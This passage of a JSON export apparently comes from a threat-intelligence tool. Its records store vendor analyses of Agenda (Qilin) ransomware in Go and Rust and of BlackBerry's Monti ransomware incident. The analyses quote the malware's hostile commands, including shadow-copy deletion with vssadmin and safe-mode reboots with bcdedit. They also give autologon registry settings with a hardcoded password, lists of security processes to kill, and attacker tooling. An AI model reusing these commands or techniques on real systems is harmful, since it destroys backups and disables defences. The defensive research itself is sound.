functionality, as listed in the table below.\nArgument  Description\n-alter {int}  Defines the port number for this child process\n-encryption {value}  Allows for redefining the embed encryptor config to the customized choice \n-ips {IP Address}  Allows for providing IP addresses \n-min-size {value}  Defines the minimum file size to encrypt (e.g., 1 KB, 1 MB, 1 GB, 666 KB) \n-no-proc  Defines the processes that will not be killed \n-no-services  Defines the services that will not be killed \n-password {string}   Defines the password to enter landing\n-path {directory}  Defines the path that parses directories; if this flag is used and left empty, all directories will be scanned\n-safe  Boots in safe mode \n-stat  Makes malware print its configuration (processes and services to be killed, encryption, etc.)  \nTable 1. Command-line arguments accepted by Agenda\nAgenda builds a runtime configuration to define its behavior, including its public RSA key, encryption conditions, list of processes and services to terminate, encryption extension, login credentials, and ransom note. \nRuntime configuration component  Description\npublic_rsa_pem  RSA public key\ndirectory_black_list  Directories excluded from encryption\nfile_black_list  File names excluded from encryption\nfile_pattern_black_list  File name extensions excluded from encryption\nprocess_black_list  Processes to terminate\nwin_services_black_list  Services to terminate\ncompany_id  Encryption extension\naccounts  Login credentials\nnote  Ransom note\nTable 2. The runtime configuration components of Agenda\nAs part of its initial routine, Agenda determines if the machine is running in safe mode by checking the string safeboot in the data of this registry value: \nHKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control SystemStartOptions \nIf it detects that the machine is running in safe mode, it terminates execution. \nThe ransomware then removes shadow volume copies via execution of vssadmin.exe delete shadows /all /quiet, as well as terminating specific processes and services indicated in its runtime configuration, some of which are antivirus-related processes and services. \nProcesses  Services\na2service.exe  acronis vss provider \na2start.exe  acronis vss provider \naawservice.exe  acronisagent \nashserv.exe  acronisagent \navengine.exe  acronisagentd\navkwctl.exe  avbackup \nblackd.exe  avbackupd\ncfp.exe  ccevtmgr\nfsav32.exe   macmnsvc\nfsdfwd.exe  macmnsvcd \nfsguiexe.exe   masvc\nkpf4gui.exe  masvcd\nmcods.exe  mcshield\nmcpalmcfg.exe  sentinelagent \nmcproxy.exe  sentinelagentd\nmcregwiz.exe  sentinelhelperservice \nmcsacore.exe  sentinelhelperserviced \nmcshield.exe  sentinelstaticengine \nmpfagent.exe  sentinelstaticengined\nmpfservice.exe  shmonitor \nmsmpeng.exe  shmonitord\nmsscli.exe  smcinst\nnisum.exe  tmccsf \nntrtscan.exe  tmccsfd\npccpfw.exe  tmlisten \ntmntsrv.exe  tmlistend\nTable 3. Some of the antivirus-related processes and services terminated by Agenda\nAfter its initial routine, Agenda proceeds to create the runonce autostart entry *aster pointing to enc.exe, which is a dropped copy of itself under the Public folder:  \nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce*aster = %Public%\\enc.exe\nChanging user passwords and rebooting in safe mode\nAgenda also deploys a detection evasion technique during encryption: It changes the default user’s password and enables automatic login with the new login credentials. This feature can be enabled using the -safe command-line argument. Similar to REvil, Agenda reboots the victim’s machine in safe mode and then proceeds with the encryption routine upon reboot. \nTo begin, Agenda lists all local users found on the device and then checks which one is set as the default user.  \nFigure 6. The function used by Agenda to determine the default user from local users\nUpon finding the default user, Agenda changes the user’s password to Y25VsIgRDr. \nFigure 7. The function used by Agenda to change the default user’s password\nIt then proceeds to configure the Winlogon registry entry, setting the data to each of these values: \nSOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ \nAutoAdminLogon value =1\nDefaultUserName = {username}\nDefaultDomainName ={domainname}\nDefaultPassword={ Y25VsIgRDr}\nFigure 8. The Winlogon registry entry configured by Agenda\nUpon changing the default user’s password and enabling automatic login, Agenda reboots the victim’s machine in safe mode via this command: \nC:\\windows\\system32\\bcdedit.exe  /set safeboot{current} network\nThe ransomware also reboots the machine in normal mode after the encryption using this command:\nC:\\Windows\\System32\\bcdedit.exe /set safeboot network bcdedit /deletevalue {default} safeboot\nImpersonation of legitimate accounts\nAnother feature of Agenda is its ability to abuse local account credentials to execute the ransomware binary, using the embedded login credentials in its runtime configuration.\nFigure 9. Agenda’s embedded local account credentials\nAgenda begins the user impersonation by parsing the accounts in the runtime configuration and then separating them into username, domain, and password. It will use this data to attempt logging a user on to the local computer via the API LogonUserW.\nFigure 10. The function used by Agenda to parse the accounts field in the runtime configuration\nFigure 11. Agenda performing logon using a parsed account\nAgenda then proceeds to generate a random port number, which it will use in the execution of the ransomware binary through the API CreateProcessAsUserW in conjunction with the command-line argument -alter.\nFigure 12. Agenda creating a new process with the -alter argument\nAllowing network sharing\nAgenda is also associated with the compromise of an entire network and its shared drivers. It is not only about the encryption of data on one workstation. \nThe ransomware adds a registry and then restarts the LanmanWorkstation service. After adding a new registry, it uses key [EnableLinkedConnections = 1] in the Enabling Mapped Drives drivers and then in restarting the LanmanWorkstation service. This will allow Agenda to list network drives in elevated programs like cmd.\nFigure 13. Agenda changing the registry value of EnableLinkedConnection to 1\nFigure 14. Agenda restarting the LanmanWorkstation service\nEncryption algorithm\nAgenda uses AES-256 for encrypting files and RSA-2048 for encrypting the generated key. To do so, it first generates the key and initialization vector (IV) that it will use for encryption by using the function generateKye, and then uses the API rand_read(). \nFigure 15. The function used by Agenda to generate a random key\nWith this randomly generated key, Agenda proceeds to use AES-256 to encrypt target files. Lastly, it encrypts the key using RSA-2048 through the embedded public key from the runtime configuration.  \nAfter successful encryption, Agenda renames the encrypted files by appending the company ID indicated in the runtime configuration. It then drops the ransom note {company_id}-RECOVER-README.txt in each encrypted directory.  \nFigure 16. Agenda’s ransom note\nProcess injection\nAgenda drops pwndll.dll, detected as Trojan.Win64.AGENDA.SVT, in the Public folder. The file pwndll.dll is a patched DLL from the legitimate DLL WICloader.dll written in C, not Go. Agenda injects this DLL into svchost.exe to allow continuous execution of the ransomware binary.\nFigure 17. Agenda injecting pwndll.dll into svchost.exe\nFigure 18. Agenda using pwndll.dll to execute the ransomware sample\nConclusion and solutions\nRansomware continues to evolve, developing more sophisticated methods and techniques to trap organizations. Our investigation shows how the new targeted ransomware Agenda is written in the Go language, making it harder to detect and analyze. \nThis ransomware has techniques for evading detection by taking advantage of the “safe mode” feature of a device to proceed with its encryption routine unnoticed. The ransomware also takes advantage of local accounts to log on as spoofed users and execute the ransomware binary, further encrypting other machines if the logon attempt is successful. It also terminates numerous processes and services, and ensures persistence by injecting a DLL into svchost.exe. \nEnd users and organizations alike can mitigate the risk of infection from ransomware like Agenda by following these security best practices:  \nEnable multifactor authentication (MFA) to prevent attackers from performing lateral movement inside a network. \nAdhere to the 3-2-1 rule when backing up important files. This involves creating three backup copies on two different file formats, with one of the copies stored in a separate location.  \nPatch and update systems regularly. It’s important to keep operating systems and applications up to date, preventing malicious actors from exploiting any software vulnerabilities. \nOrganizations can also benefit from security solutions that offer multilayered detection and response, such as Trend Micro Vision One™, which has multilayered protection and behavior detection capabilities that help block suspicious behavior and tools before ransomware can do any damage. Trend Micro Apex One™ also provides next-level automated threat detection and response to protect endpoints against advanced issues, like fileless threats and ransomware. \nAdditional insights provided by Eleazar Valles and Sherif Magdy.\nFor more information about the indicators of compromise, download this document. \nMITRE ATT&CK tactics and techniques\nTags\nEndpoints\n|\nRansomware\n|\nResearch\n|\nArticles, News, Reports\n|\nCyber Threats\nAuthors\nMohamed Fahmy\nThreat Intelligence Analyst\nNathaniel Gregory Ragasa\nThreat Analyst\nEarle Maui Earnshaw\nThreats Analyst\nBahaa Yamany\nIncident Response Engineer\nJeffrey Francis Bonaobra\nThreat Research Engineer\nJay Yaneza\nDirector, MDR Operations\nCONTACT US SUBSCRIBE\nRelated Articles\nExamining the Activities of the Turla APT Group\nExposing Infection Techniques Across Supply Chains and Codebases\nRevisiting 16shop Phishing Kit, Trend-Interpol Partnership\nSee all articles\nTry our services free for 30 days\nStart your free trial today\nResources\nSupport\nAbout Trend\nSelect a country / region\nUnited States\nexpand_more\nPrivacy | Legal | Accessibility | Site map\nCopyright ©2023 Trend Micro Incorporated. All rights reserved\nThis website uses cookies for website functionality, traffic analytics, personalization, social media functionality and advertising. Our Cookie Notice provides more information and explains how to amend your cookie settings.Learn more\nDo Not Sell My Personal Information Accept Cookies",
  "status": "FAILED TO ANALYZE",
  "report_type": "WEBSITE",
  "added_on": {
    "$date": "2023-10-09T18:41:08.567Z"
  },
  "added_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "updated_by": "JODXxzgrRphYBU6pDa6huM2JSPL2",
  "updated_on": {
    "$date": "2023-10-09T19:23:15.320Z"
  },
  "gcloud_request": null,
  "message": "Traceback (most recent call last):\n  File \"/workspace/services/threat_analysis/threat_analysis_orchestrator.py\", line 106, in __convert_openAI_analysis\n    ThreatReportCCFESerializer().load(analysis)\n  File \"/layers/google.python.pip/pip/lib/python3.11/site-packages/marshmallow/schema.py\", line 722, in load\n    return self._do_load(\n           ^^^^^^^^^^^^^^\n  File \"/layers/google.python.pip/pip/lib/python3.11/site-packages/marshmallow/schema.py\", line 909, in _do_load\n    raise exc\nmarshmallow.exceptions.ValidationError: {'threat_actor': ['Shorter than minimum length 1.']}\n"
},
{
  "_id": {
    "$oid": "652454b8dd4337e9edebd484"
  },
  "name": "Agenda Ransomware (qilin group) Take 2",
  "file_type": null,
  "website_url": "https://www.trendmicro.com/en_us/research/22/l/agenda-ransomware-uses-rust-to-target-more-vital-industries.html",
  "website_title": "Agenda Ransomware Uses Rust to Target More Vital Industries",
  "file_name": null,
  "file_size": null,
  "content": "Business\nsearch\nRansomware\nAgenda Ransomware Uses Rust to Target More Vital Industries\nThis year, various ransomware-as-a-service groups have developed versions of their ransomware in Rust, including Agenda. Agenda's Rust variant has targeted vital industries like its Go counterpart. In this blog, we will discuss how the Rust variant works.\nBy: Nathaniel Morales, Ivan Nicole Chavez, Nathaniel Gregory Ragasa, Don Ovid Ladores, Jeffrey Francis Bonaobra, Monte de Jesus\nDecember 16, 2022\nRead time: 5 min (1239 words)\nSubscribe\nThis year, ransomware-as-a-service (RaaS) groups like BlackCat, Hive, and RansomExx have developed versions of their ransomware in Rust, a cross-platform language that makes it easier to tailor malware to different operating systems like Windows and Linux. In this blog entry, we shed light on Agenda (also known as Qilin), another ransomware group that has started using this language.\nAccording to our observations in the past month, the Agenda ransomware’s activities included posting  numerous companies on its leak site. The threat actors not only claimed that they were able to breach the servers of these companies but also threatened to publish their files. The companies that the ransomware group posts on its leak site are located in different countries and belong mostly in the manufacturing and IT industries, with a combined revenue that surpasses US$550 million.\nRecently, we found a sample of the Agenda ransomware written in Rust language and detected as Ransom.Win32.AGENDA.THIAFBB. Notably, the same ransomware, originally written in Go language, was known for targeting healthcare and education sectors in countries like Thailand and Indonesia. The actors customized previous ransomware binaries for the intended victim through the use of confidential information such as leaked accounts and unique company IDs as the appended file extension. The Rust variant has also been seen using intermittent encryption, one of the emerging tactics that threat actors use today for faster encryption and detection evasion.\nFigure 1. Submission details of the binary in VirusTotal, including the submission date and region it was uploaded.\nFigure 2. Strings viewed on BinText showing Rust modules/functions used by the binary\nBlackbox analysis\nWhen executed, the Rust binary prompts the following error requiring a password to be passed as an argument. This command-line feature is similar to the Agenda ransomware binaries written in Golang.\nFigure 3. Error prompt when the sample was executed\nUpon execution of the sample with “—password” as its parameter in conjunction with a dummy password “AgendaPass,” the ransomware sample runs its malicious routine starting with the termination of various processes and services.\nFigure 4. Termination of applications and services\nSpecific to the sample we analyzed, the ransomware appends the extension \"MmXReVIxLV” to encrypted files. It also displays activity logs on the command prompt, including the file it has encrypted and the elapsed time.\nFigure 5. Examples of encrypted files\nFigure 6. Logs in encrypting files\nThe ransomware will then proceed to drop its ransom note on every directory it encrypts. As observed in its ransom note, the password used to execute the ransomware will also be used as the password for logging in to the support chat site of the ransomware group.\nFigure 7. Agenda ransom note\nAgenda ransomware analysis\nUnlike Agenda’s Golang variant, which accepts 10 arguments, its Rust variant only accepts three arguments:\nArgument Description\n-password {string} Defines the password to enter landing\n-ips {IP address} Allows for providing IP addresses\n-paths {directory} Defines the path that parses directories; if this flag is used and left empty, all directories will be scanned \nTable 1. Arguments used by the Agenda ransomware’s Rust variant\nThe Rust variant also contains hard-coded configuration inside its binaries like the earlier samples compiled in Golang.\nFigure 8. Function inside the binary containing the configuration\nFigure 9. Strings containing the configuration\nIt also added the -n, -p, fast, skip, and step flags on its configurations, which are not present in the Golang variant configuration and only used via command-line argument. Upon further analysis, we have learned that these flags are used for intermittent encryption. This tactic enables the ransomware to encrypt the victim’s files faster by partially encrypting the files depending on the values of the flags. This tactic is becoming more popular among ransomware actors as it lets them encrypt faster and avoid detections that heavily rely on read/write file operations.\nFlags Description\nfast Encrypts the first (N*0x200000h) of the file\nskip (N) – step (Y) Skip encryption for N bytes after encrypting Y bytes of the file\nn: {N} p: {P} Encrypt (N*0x200000h) of the file and skips p bytes (P - percentage of the file size)\nTable 2. Flags used for intermittent encryption\nFigure 10. Flags used for intermittent encryption\nFigure 11. Command-line arguments accepted by the Golang variant of the Agenda ransomware\nWe tried to mimic its encryption behavior using some of the flags present on its configuration. For this simulation, we used a dummy file filled with “A” as its content.\nFor fast mode:\nValue: 1\nFigure 12. Fast flag set to 1\nEncrypted bytes: 1 * 0x200000h, where 1 is the value set in the fast flag\nFigure 13. 0x200000h bytes encrypted\nFor N-P mode:\nFigure 14. flags set to n = 1; p = 1\nTotal size = 88,082,336 bytes\nBytes encrypted = 1 * 0x200000,h where 1 is the value set in the n flag\nBytes skipped = 880,818 bytes (1% of the whole file), where 1 is the value set in the p flag\nFigure 15. 0x200000h of bytes encrypted\nFigure 16. 880,818 bytes (equivalent to 1% of the file) encrypted\nAside from the additional flags used for different encryption modes, the Rust variant has included AppInfo to its roster of services to terminate. It disables User Account Control (UAC), a Windows feature that helps prevent malware from executing with administrative rights, resulting in the inability to run other applications with administrative privileges.\nFigure 17. Function used to stop service using parameter 0x01 equivalent to SERVICE_CONTROL_STOP\nFigure 18. Function used for disabling services using parameter 0x04 equivalent to SERVICE_DISABLED\nFigure 19. Unable to run an application with administrative rights after disabling AppInfo service\nThe Agenda ransomware is also known to deploy customized ransomware for each victim, and we have seen that its Rust variants have an allocated space for adding accounts in their configuration to be used mostly for privilege escalation.\nFigure 20. Allocated accounts in the Rust variant configuration of the Agenda ransomware\nThe file extension to be appended on the encrypted files is hard-coded in its configuration.\nFigure 21. File extension to be appended\nUnlike the previous Golang variant, however, the threat actors did not include the credentials of the victim in the configuration of the Rust variant. This feature of the latter prevents other researchers not only from visiting the ransomware’s chat support site but also accessing the threat actors’ conversations when a sample becomes available externally. It also prevents unsolicited messages from other people besides the victim.\nFigure 22. The Agenda ransomware chat support site\nConclusion\nAn emerging ransomware family, Agenda has recently been targeting critical sectors such as healthcare and education industries. At present, its threat actors appear to be migrating their ransomware code to Rust as recent samples still lack some features seen in the original binaries written in the Golang variant of the ransomware. Rust language is becoming more popular among threat actors as it is more difficult to analyze and has a lower detection rate by antivirus engines.\nThreat actors continue to favor ransomware as their tool of choice for conducting their operations, reiterating the call for enterprises and organizations to rely on a multilayered solution to secure data. Trend Micro Vision One™ provides visibility, correlated detection, and behavior monitoring across multiple layers: email, endpoints, servers, cloud workloads to help enterprises and organizations protect their systems from different threats, including ransomware.\nIndicators of Compromise (IOCs)\nSHA256 Detection\ne90bdaaf5f9ca900133b699f18e4062562148169b29cb4eb37a0577388c22527 Ransom.Win32.AGENDA.THIAFBB\n55e070a86b3ef2488d0e58f945f432aca494bfe65c9c4363d739649225efbbd1 Ransom.Win32.AGENDA.THIAHBB\n37546b811e369547c8bd631fa4399730d3bdaff635e744d83632b74f44f56cf6 Ransom.Win32.AGENDA.THIAHBB\nTags\nEndpoints\n|\nRansomware\n|\nResearch\n|\nArticles, News, Reports\nAuthors\nNathaniel Morales\nThreat Analyst\nIvan Nicole Chavez\nThreat Analyst\nNathaniel Gregory Ragasa\nThreat Analyst\nDon Ovid Ladores\nThreats Analyst\nJeffrey Francis Bonaobra\nThreat Research Engineer\nMonte de Jesus\nThreats Analyst\nCONTACT US SUBSCRIBE\nRelated Articles\nExamining the Activities of the Turla APT Group\nExposing Infection Techniques Across Supply Chains and Codebases\nRevisiting 16shop Phishing Kit, Trend-Interpol Partnership\nSee all articles\nTry our services free for 30 days\nStart your free trial today\nResources\nSupport\nAbout Trend\nSelect a country / region\nUnited States\nexpand_more\nPrivacy | Legal | Accessibility | Site map\nCopyright ©2023 Trend Micro Incorporated. All rights reserved\nThis website uses cookies for website functionality, traffic analytics, personalization, social media functionality and advertising. Our Cookie Notice provides more information and explains how to amend your cookie settings.Learn more\nDo Not Sell My Personal Information Accept Cookies",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "added_on": {
    "$date": "2023-10-09T19:30:00.151Z"
  },
  "added_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "updated_by": "JODXxzgrRphYBU6pDa6huM2JSPL2",
  "updated_on": {
    "$date": "2023-10-09T19:57:52.780Z"
  },
  "gcloud_request": null,
  "message": "Completed Successfully"
},
{
  "_id": {
    "$oid": "65245516dd4337e9edebd485"
  },
  "name": "Monti Ransomware",
  "file_type": null,
  "website_url": "https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger",
  "website_title": "The Curious Case of “Monti” Ransomware: A Real-World Doppelganger",
  "file_name": null,
  "file_size": null,
  "content": "BlackBerry Logo\nBlackBerry Blog\nBlackBerry Blog\nThe Curious Case of “Monti” Ransomware: A Real-World Doppelganger\nThe Curious Case of “Monti” Ransomware: A Real-World Doppelganger\nRESEARCH & INTELLIGENCE / 09.07.22 / Anuj Soni, Ryan Chapman\nShare on Twitter\nShare on Facebook\nShare on Linked In\nEmail\nA ransomware victim called in the BlackBerry Incident Response (IR) team during this year's 4th of July holiday weekend. We quickly realized we were investigating an attack by a previously unknown group, calling themselves \"MONTI.\" They encrypted nearly 20 user hosts along with a multi-host VMware ESXi cluster that brought down over 20 servers.\nThreat research shows that the only credible reference of the “Monti” ransomware group prior to today was a tweet from security researchers at MalwareHunterTeam, posted on June 30, 2022. The Twitter post mentioned the possibility that Monti ransomware may have had “5-10 victims in the past months,” though no data is publicly available on these victims.\nMost Indicators of Compromise (IOCs) identified by the BlackBerry IR team in the Monti attack were also seen in previous Conti ransomware cases — except one: Monti threat actors leveraged the Action1 Remote Monitoring and Maintenance (RMM) agent.\nThis article provides a general overview of the incident, denotes the unique characteristics of this “new” threat actor group, and includes malware analysis of the payload used. We also include a breakdown of “Veeamp,” a password stealer malware targeting the Veeam data backup application, which was identified during the incident.\nOperating System\nRisk & Impact\nMonti Ransomware Incident Overview\nOn July 5, 2022, a client engaged the BlackBerry® Security Services Incident Response team to perform a forensic investigation and respond to a ransomware-related security incident. The security incident occurred when a threat actor group calling itself “MONTI” obtained access to the client’s environment.\nThe threat actor apparently intruded via an exploitation of the well-known “Log4Shell” vulnerability (a.k.a. CVE-2021-44228) in the client’s internet-facing VMware Horizon virtualization system. At the time the BlackBerry team was engaged, the operators had already initially encrypted 18 user desktops. They also encrypted a three-server ESXi cluster that resulted in 21 virtualized servers being impacted. Figure 1 provides an overview of the incident.\nFigure 1 - Overview of the “MONTI strain” ransomware incident\nThe threat actor initially obtained access to the client’s VMware Horizon Connection Broker server via Log4Shell exploitation on June 29, 2022. After entering the client’s environment, it installed the Google Chrome™ browser and used it to download attack tools to the server.\nThe threat actor also downloaded and installed two remote monitoring and maintenance (RMM) agents, AnyDesk and Action1, which we’ll describe in more detail later. It used these agents to establish persistence within the network and to facilitate additional remote access.\nThe attackers also used tooling they’d brought into the environment to dump credentials from memory and scan the network. They used Microsoft® Windows® built-in Remote Desktop Protocol (RDP) to connect to other servers, access data files on network shares, and eventually to deploy the “MONTI” strain of ransomware. The goal of this activity was to encrypt multiple hosts within the network (including Veeam-based backups).\nMeet the Mysterious Monti Ransomware Group\nThe threat group referring to itself as “MONTI” is little-known within the threat intelligence community. The limited evidence we discovered regarding this threat actor indicates they emerged between May and June 2022.\nBased on analysis conducted in this investigation, BlackBerry researchers believe that the Monti group has purposefully (and brazenly) mimicked the better-known \"Conti\" team's tactics, techniques, and procedures (TTPs), along with many of its tools and its ransomware encryptor payload.\nIt seems likely that attackers chose this blatant emulation strategy because of the availability of Conti group’s internal communications, chat logs, training guides, real-world identities, and source code — all of which were publicly leaked on the internet starting in February 2022. Having access to this trove of information effectively gave Monti threat actors a step-by-step guide to emulating Conti’s notoriously successful activities.\nAs a response to the data leak, the Conti group went into hiding. Currently, the original Conti ransomware operations group is believed to have dispersed and is no longer in business.\nAt the time of writing this report, public internet and darknet research revealed only a single mention of the Monti ransomware crew, in the form of a Twitter post from the account “MalwareHunterTeam” (@malwrhunterteam). This tweet, shown in Figure 2, includes a screenshot of the “MONTI strain” ransomware note, and alludes to possible re-use of the Conti codebase.\nFigure 2 - A tweet from June 30, 2022, discussing “MONTI strain” of ransomware\nBecause a mountain of analysis already exists to explain Conti ransomware operations, we will focus on what makes the Monti group unique, and what you can expect when a “doppelganger” group such as this spins up operations.\nUnique Characteristics of Monti Ransomware\nThe ransom note left by the threat actor is taken directly from previously seen Conti notes, with two minor changes:\nThe beginning of the note mentions “MONTI” as opposed to “CONTI.” (The remainder of this sentence is Conti’s verbiage, including the instruction to “Google it”: “All of your files are currently encrypted by MONTI strain. If you don't know who we are - just ‘Google it.’”)\nThe TOR-based (.onion domain) URL provided for contacting the Monti group is unique.\nAs of July 5, 2022, the .onion domain provided for contacting Monti was unavailable. BlackBerry researchers were unable to find any indication that the domain was ever accessible. Public and darknet research, along with communications with fellow incident response firms, did not reveal any confirmation that the domain was up and running at any time.\nGiven the lack of evidence from other Monti cases, we might never know if the domain was ever accessible. If this is the case, the Monti group might have never been able to collect a ransom. (Should any researcher reading this article have information on a Monti domain/URL being accessible, we would love to hear from you.)\nIn addition to changes in the ransom note, the threat actor leveraged a commercial, cloud-based RMM platform called Action1, which has not previously been used in a ransomware attack. Ransomware actors, including Conti, commonly use commercial RMMs such as AnyDesk during their attacks. In fact, instructions for installation and configuration of the AnyDesk RMM are detailed in the “CobaltStrike MANUALS_V2 Active Directory” attack manual that was leaked from the Conti group in 2021. Figure 3 shows a screenshot from this manual, featuring AnyDesk installation instructions.\nFigure 3 - Example of installation instructions for AnyDesk, as seen in a leaked “CobaltStrike MANUALS_V2 Active Directory” document\nThe names of the Action1 agent executables that threat actors used in the Monti attack matched those used by the RMM product itself. Specifically, the files found within the client environment were labeled “action1_agent.exe” and “action1_remote.exe.”\nWhen ransomware actors change a file’s name, they often do not change the OriginalFileName value. This value is found within the portable executable’s (PE’s) resources. Though alteration of this value is possible, many actors leave these values alone. As such, you can often find a renamed file by querying against the OriginalFileName value via your endpoint detection and response (EDR) tool, or Sysmon, among other tools.\nFigure 4 shows the file version information for action1_agent.exe, as seen on VirusTotal.\nFigure 4 - action1_agent.exe file version information as seen on VirusTotal\nAn example Lucene-based query for the Elasticsearch search and analytics engine might be [OriginalFileName:\"action1_agent.exe\"]. (Keep this method in mind, as it is very handy during ransomware investigations.)\nTools Leveraged in the Ransomware Attack\nThe attackers used two well-known temporary file transfer websites – dropmefiles.com[.]ua and temp[.]sh – to bring tools into the network and to exfiltrate data. They leveraged the Google Chrome web browser to access these sites and download tools.\nThe attackers’ choice to use Chrome™ rather than Internet Explorer (IE) may be due to the client’s implementation of Enhanced Security Configuration (ESC), an option that can be enabled on Windows servers that prohibits general internet browsing via IE. To bypass the ESC configuration, the attackers used Chrome, allowing them to freely browse web pages.\nTable 1 lists the various tools leveraged by the Monti group.\nTool\nType\nDetails\nAction1 RMM\nRMM\n- Commercial Remote Monitoring & Maintenance agent.\n- Used by TAs to provide remote access to a victim network.\nAnyDesk RMM\nRMM\n- Commercial Remote Monitoring & Maintenance agent.\n- Used by TAs to provide remote access to a victim network.\nAvast Anti-rootkit driver\nBypass Tool\n- Avast's Anti-rootkit library is useful for removing rootkits.\n- Used by threat actors to remove endpoint security products such as antivirus (AV)/endpoint protection platforms (EPPs)/ endpoint protection and response (EDR), etc.\nGMER\nBypass Tool\n- Rootkit detector and remover\n- Used by threat actors to remove endpoint security products such as AV/EPP/EDR, etc.\nMEGASync\nData Theft\n- MEGA.io’s proprietary file synchronization agent.\n- Used by TAs to exfiltrate data from victim networks to cloud storage provider MEGA\nMimikatz\nCredential Theft\n- Free and open-source tool used to dump credentials, perform pass-the-hash/token attacks in networks, and generally obtain access to legitimate credentials\nnetscan\nnetscan64\nNetwork Scanner\n- SoftPerfect Network Scanner tool\n- Used by threat actors to scan internal networks to identify sources for lateral movement\nPSEXEC\nLateral Movement\n- Microsoft \"SysInternal\" suite utility designed for administrators to run commands on remote systems and/or copy files to remote machines\n- Commonly used by threat actors to run processes remotely and to facilitate lateral movement\nPuTTY\nData Theft\n- Data transfer tool commonly used by network administrators\n- Used by threat actors to exfiltrate data from victim networks\nVeeam-Get-Creds\nCredential Theft\n- Open-source PowerShell script designed to dump credentials from Veeam backup software\n- See https://github.com/sadshade/veeam-creds\nVeeamp\nCredential Theft\n- Custom Veeam password dumper written in Microsoft .NET\n- Detailed in the Malware Analysis section found later in this article\nWinRAR\nData Theft\n- Commercial data archival tool popularized in the early days of the internet and still used by many entities\n- Often used by threat actors to archive data prior to exfiltration\nWinSCP\nData Theft\n- Data transfer tool used by network administrators\n- Used by threat actors to exfiltrate data from victim networks\nTable 1 - Tools used by the Monti threat group\nMonti Group Data Access and Exfiltration\nWe reviewed various web browser-related files to analyze attacker access. For example, history and cache files from Internet Explorer, Chrome, and Firefox browsers revealed files potentially accessed by attackers. BlackBerry researchers uncovered more than 250 URLs indicating systems and files the threat group likely accessed.\nUsing the forensic data available on the client’s system, we were able to identify a single instance of data exfiltration. The attacker dumped the process memory of the Local Security Authority Server Service (LSASS) on the Horizon Connection Broker server, to a file named “lsass.DMP.”\nThis filename (specifically with the uppercase file suffix) is the default name given to files created from memory dumps of the LSASS process, when using Windows Task Manager. While attackers can change this filename, when this default name is used, this gives a hint at the provenance of the file.\nThe memory pages allocated to the LSASS process include credentials stored in memory that Windows uses for various authentication and authorization procedures. As such, someone who dumps the memory for this process can recover plaintext credentials by using a tool such as Mimikatz to process the memory dump. Mimikatz can also use this file to facilitate Pass-the-Hash and similar attacks.\nDuring data access analysis, BlackBerry researchers found that the threat actor accessed a URL associated with the DropMeFiles file-sharing website. Ransomware operators like this site because it offers temporary and anonymous file-sharing services. We visited the identified URL and confirmed that the attackers uploaded the dumped lsass.DMP file to the DropMeFiles site. Though users of this service can delete files at will, the threat actor neglected to do so. Thus, BlackBerry was able to obtain and review the exfiltrated memory dump.\nFigure 5 is a screenshot of the DropMeFiles site showing the lsass.DMP file that the threat actor exfiltrated from the client’s Horizon Connection Broker server.\nFigure 5 - Screenshot showing lsass.DMP exfiltration via DropMeFiles\nUsing Code Analysis to Your Advantage\nBefore we get into Monti’s reuse of Conti’s encryptor code, we want to point out a helpful trick that was made possible due to our awareness of that code re-use.\nBecause we were familiar with Conti v2 and v3 encryptor payloads, the BlackBerry IR team knew that Conti encryptor payloads do not always encrypt the entirety of each file. Source code analysis shows us that to determine which encryption methods to use, Conti payloads use a combination of a file’s location (on the disk or network), type (based on file suffix), and size.\nFor example, available ENCRYPT_MODES available in Conti v2 payloads include HEADER_ENCRYPT, PARTLY_ENCRYPT, and FULL_ENCRYPT. The PARTLY_ENCRYPT mode can be accompanied by a value of 20 or 50, indicating the percentage of the file that should be encrypted.\nResearchers Luigi Martire, Carmelo Ragusa, and Luca Mella, from the cybersecurity company Yoroi, wrote a fantastic article named “Conti Ransomware Source Code: A Well-designed COTS Ransomware,” which provides insight into the code segments that help drive these encryption decisions. In the article, you will find examples of code segments such as the one shown in Figure 6, which details encryption mode selection based on file size.\nFigure 6 - Screenshot from Martire, Ragusa, and Mella’s 2022 article that shows encryption mode selection based on file size\nThis knowledge allowed the BlackBerry IR team to extract full, unencrypted strings from encrypted log files.\nThe following command uses a simple grep query to identify the string “2022-0,” which was found at the beginning of each line in the VMware Horizon Debug logs. Notice that even though the log file included in the command below was encrypted, the command yielded over 137,000 lines of unencrypted log events.\n$ strings debug-2022-06-30-094202.txt.PUUUK | grep -i '2022-0' | wc -l\n\n  137420\n\nThis same methodology can be adapted to many other file types. Text (.txt) and general log files are obviously the best use case.\nThis isn’t just applicable to Monti or Conti. Many different ransomware encryptors use a similar process of selecting portions of each file to encrypt.\nThis possibility of decryption is just one of the many reasons why we recommend that ransomware victims back up files encrypted in these attacks. Yes, you read that right: the encrypted files.\nEven if your encrypted files can’t be decrypted in this way, sometimes researchers are able to discover decryption methods that can be offered in stand-alone tools, and ransomware operations groups occasionally release their decryption keys. In any case, encrypted data that has been saved can be revisited and potentially decrypted at a later date.\nMonti Technical Analysis\nRansomware Behavior\nThe ransomware payload associated with this incident is a 32-bit Windows executable named “locker.exe.” At the time of writing this report, the malware is not publicly available. The threat actor downloaded this payload from temp[.]sh via the Chrome browser.\nUpon execution, the malware encrypts files on disk, adds a “.PUUUK” extension to affected files’ names, and produces the following ransom note:  \nFigure 6a - Monti ransom note\nThis ransom note is almost identical to the notes produced by some Conti ransomware variants, except it references a “MONTI strain” instead of a “CONTI strain.”\nEvaluating the Relationship Between Conti and Monti\nIn light of the Conti leaks that occurred in February and March 2022, we decided to explore any connections between the executable we identified, publicly available Conti payloads, and the leaked source code.\nBrief static analysis determined that our sample’s file name, file size, compile time, import table hash, and most section hashes (with the exception of the .data section) match the corresponding characteristics of the locker.exe executable included in the Conti v3 code leaks. These observations provided strong evidence that the executable we found is, in fact, a Conti v3 payload.\nFurther analysis of the leaked Conti executable revealed that, although the code within it was identical to the sample we discovered, execution of the Conti payload did not actually result in any file encryption.\nA review of the leaked locker.exe’s .data section provided insight into the nature of this executable, as seen in Figure 7.\nFigure 7 - Strings within the leaked locker.exe Conti v3 payload\nThe presence of the strings __DECRYPT_NOTE__, .EXTEN, and 